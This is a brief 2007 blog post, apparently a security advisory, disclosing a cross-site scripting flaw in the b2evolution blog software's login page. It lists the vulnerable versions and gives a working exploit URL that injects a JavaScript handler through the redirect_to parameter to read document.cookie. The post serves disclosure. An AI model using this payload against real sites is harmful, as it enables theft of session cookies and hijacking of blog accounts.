Monday, February 26, 2007

 

XSS in b2Evolution

b2evolution is "a free blog tool for the next generation of blogs". A cross site scripting vulnerability in b2Evolution's login page allows attackers to insert arbitrary HTML and/or JavaScript into the login page.

Vulnerable versions:
0.9.0.12, 0.9.1, 1.6-alpha, 1.8.6, 1.9.1-beta

Exploit:
http://[site.com]/htsrv/login.php?redirect_to=%22%20onmouseover=%22
alert(document.cookie) <--- in 1 string.

This page is powered by Blogger. Isn't yours?